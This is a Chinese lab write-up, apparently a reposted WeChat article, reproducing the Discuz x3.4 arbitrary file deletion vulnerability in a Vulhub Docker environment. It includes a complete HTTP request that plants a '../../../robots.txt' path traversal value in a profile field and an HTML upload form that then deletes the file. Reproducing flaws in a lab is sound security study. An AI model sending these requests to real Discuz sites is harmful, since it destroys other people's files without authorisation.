Discuz x3.4任意文件删除漏洞复现

admin 2023年5月15日23:53:31评论116 views字数 1983阅读6分36秒阅读模式

前言

漏洞环境使用的是Vulhub靶场,方便快捷,搭建方法可以参考Vulhub靶场在Centos7上的搭建

过程记录


1、进入目录启动docker容器

cd /home/vulhub-master/discuz/x3.4-arbitrary-file-deletion/    #这里是你存放vulhub的路径docker-compose up -d      #启动docker容器docker-compose ps      #查看服务端口,这里80端口

Discuz x3.4任意文件删除漏洞复现


2、浏览器访问地址"IP+PORT"(我这里是192.168.163.141:80),默认点击下一步即可,安装数据库时,记得将“数据库服务器”设置成“db”即可

Discuz x3.4任意文件删除漏洞复现


3、成功进入Discuz主界面

Discuz x3.4任意文件删除漏洞复现


4、访问“http://192.168.163.141/robots.txt”,发现文件存在

Discuz x3.4任意文件删除漏洞复现


5、随便注册一个账户123456,登陆后进入个人资料页面,然后查看元素(F12),找到formhash值

Discuz x3.4任意文件删除漏洞复现


6、利用Burp Suit发送以下数据包(发包时请删除里面的注释)


POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1Host: localhost      #这里设置IPContent-Length: 367Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: [your cookie]      #这里设置你注册用户的cookie值Connection: close
------WebKitFormBoundaryPFvXyxL45f34L12sContent-Disposition: form-data; name="formhash"
[your formhash] #这里设置你的formhash------WebKitFormBoundaryPFvXyxL45f34L12sContent-Disposition: form-data; name="birthprovince"
../../../robots.txt #这里就是需要删除的文件路径------WebKitFormBoundaryPFvXyxL45f34L12sContent-Disposition: form-data; name="profilesubmit"
1------WebKitFormBoundaryPFvXyxL45f34L12s--


7、发包成功后,回到个人资料页面,发现出生地被修改成了“../../../robots.txt”

Discuz x3.4任意文件删除漏洞复现


8、紧接着创建一个html文件(记得修改对应的IP和formhash),然后浏览器打开,上传一个图片即可,对应的文件就被删除了

<body>    <form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">        <input type="file" name="birthprovince" />        <input type="submit" value="upload" />    </form></body>


9、发包再次访问“http://192.168.163.141/robots.txt”,已经是404页面了

Discuz x3.4任意文件删除漏洞复现

漏洞成功复现,虽然全程是照着文档做的,但是也能积累一定的经验,难免日后会碰到


10、最后关闭容器

docker-compose down

公众号已经将已发布资料打包好了,关注公众号点击“资料领取”,就可以获取了,后续会更新更多资源,谢谢各位客官支持。


更多文章请关注公众号:星河疯客admin

Discuz x3.4任意文件删除漏洞复现

万水千山总是情,点赞再走行不行的(ง •_•)ง

原文始发于微信公众号(星河疯客admin):Discuz x3.4任意文件删除漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月15日23:53:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Discuz x3.4任意文件删除漏洞复现https://cn-sec.com/archives/880910.html

发表评论

匿名网友 填写信息